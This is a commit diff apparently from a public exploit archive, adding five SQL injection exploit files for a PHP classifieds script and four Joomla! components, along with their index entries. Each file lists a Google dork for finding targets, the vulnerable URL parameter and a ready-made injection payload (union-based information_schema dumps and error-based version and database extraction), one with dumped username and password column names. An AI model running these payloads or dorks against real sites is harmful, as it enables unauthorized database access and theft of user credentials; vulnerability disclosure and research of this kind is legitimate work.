DB: 2017-03-03

5 new exploits Php Classified OLX Clone Script - 'category' Parameter SQL Injection Joomla! Component Abstract 2.1 - SQL Injection Joomla! Component StreetGuessr Game 1.0 - SQL Injection Joomla! Component Guesser 1.0.4 - 'type' Parameter SQL Injection Joomla! Component Recipe Manager 2.2 - 'id' Parameter SQL Injection
2017-03-03 05:01:17 +00:00 · 2017-03-03 05:01:17 +00:00 · a3ee969c7d
commit a3ee969c7d
parent 846ce42eca
6 changed files with 102 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -37396,6 +37396,7 @@ id,file,description,date,author,platform,type,port
 41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
 41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0
 41478,platforms/hardware/webapps/41478.txt,"DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",hardware,webapps,0
 41492,platforms/php/webapps/41492.txt,"Php Classified OLX Clone Script - 'category' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
 41482,platforms/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",xml,webapps,0
 41483,platforms/php/webapps/41483.html,"WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting",2017-03-01,"Edwin Molenaar",php,webapps,80
 41484,platforms/php/webapps/41484.txt,"WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting",2017-03-01,"Axel Koolhaas",php,webapps,80
@ -37406,3 +37407,7 @@ id,file,description,date,author,platform,type,port
 41489,platforms/php/webapps/41489.txt,"SchoolDir - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
 41490,platforms/php/webapps/41490.txt,"Rage Faces Script 1.3 - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
 41491,platforms/php/webapps/41491.txt,"Meme Maker Script 2.1 - 'user' Parameter SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
 41493,platforms/php/webapps/41493.txt,"Joomla! Component Abstract 2.1 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
 41494,platforms/php/webapps/41494.txt,"Joomla! Component StreetGuessr Game 1.0 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
 41495,platforms/php/webapps/41495.txt,"Joomla! Component Guesser 1.0.4 - 'type' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
 41496,platforms/php/webapps/41496.txt,"Joomla! Component Recipe Manager 2.2 - 'id' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
--- a/platforms/php/webapps/41492.txt
+++ b/platforms/php/webapps/41492.txt
@ -0,0 +1,23 @@
 # # # # # 
 # Exploit Title: Php Classified OLX Clone Script - SQL Injection
 # Google Dork: N/A
 # Date: 02.03.2017
 # Vendor Homepage: https://wptit.com/
 # Software: https://wptit.com/portfolio/php-classified-website-sale/
 # Demo: http://www.adsthem.com/
 # Version: N/A
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/search?search_key=IhsanSencan&category=[SQL]
 # -30+/*!50000union*/+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))-- -
 # Etc....
 # :username<li>atulya_moderators
 # :password<li>atulya_moderators
 # :fullname<li>atulya_moderators
 # :email<li>atulya_moderators
 # # # # #
--- a/platforms/php/webapps/41493.txt
+++ b/platforms/php/webapps/41493.txt
@ -0,0 +1,19 @@
 # # # # # 
 # Exploit Title: Joomla! Component Abstract v2.1 - SQL Injection
 # Google Dork: inurl:index.php?option=com_abstract
 # Date: 02.03.2017
 # Vendor Homepage: http://joomla6teen.com/
 # Software: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/abstract-manager/
 # Demo: http://demo.joomla6teen.com/abstractmanager
 # Version: 2.1
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&layout=detail&pid=[SQL]
 # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&task=contactEmail&pid=[SQL]
 # 1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
 # # # # #
--- a/platforms/php/webapps/41494.txt
+++ b/platforms/php/webapps/41494.txt
@ -0,0 +1,18 @@
 # # # # # 
 # Exploit Title: Joomla! Component StreetGuessr Game v1.0 - SQL Injection
 # Google Dork: inurl:index.php?option=com_streetguess
 # Date: 02.03.2017
 # Vendor Homepage: https://www.nordmograph.com/
 # Software: https://extensions.joomla.org/extensions/extension/sports-a-games/streetguessr-game/
 # Demo: https://www.streetguessr.com/
 # Version: 1.0
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_streetguess&view=leaderboard&id=[SQL]
 # 7'+/*!50000Procedure*/+/*!50000Analyse*/+(/*!50000extractvalue*/(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,/*!50000@@version*/)),0)-- -
 # # # # #
--- a/platforms/php/webapps/41495.txt
+++ b/platforms/php/webapps/41495.txt
@ -0,0 +1,18 @@
 # # # # # 
 # Exploit Title: Joomla! Component Guesser v1.0.4 - SQL Injection
 # Google Dork: inurl:index.php?option=com_guesser
 # Date: 02.03.2017
 # Vendor Homepage: http://www.bitsgeo.com/
 # Software: https://extensions.joomla.org/extensions/extension/marketing/guesser/
 # Demo: http://www.bitsgeo.com/guesson/
 # Version: 1.0.4
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/guessers?type=[SQL]
 # 'and(select+1+from+(select+count(*),concat((select(select+concat(cast(database()+as+char),0x3c3c3c,0x7e,0x496873616e2053656e63616e))+from information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables group+by+x)a)+AND+'Ihsan'='Sencan
 # # # # #
--- a/platforms/php/webapps/41496.txt
+++ b/platforms/php/webapps/41496.txt
@ -0,0 +1,19 @@
 # # # # # 
 # Exploit Title: Joomla! Component Recipe Manager v2.2 - SQL Injection
 # Google Dork: inurl:index.php?option=com_recipe
 # Date: 02.03.2017
 # Vendor Homepage: http://joomla6teen.com/
 # Software: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/recipe-manager/
 # Demo: http://demo.joomla6teen.com/recipemanager/
 # Version: 2.2
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_recipe&view=recipes&task=print_ingred&id=[SQL]
 # 10'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
 # # # # #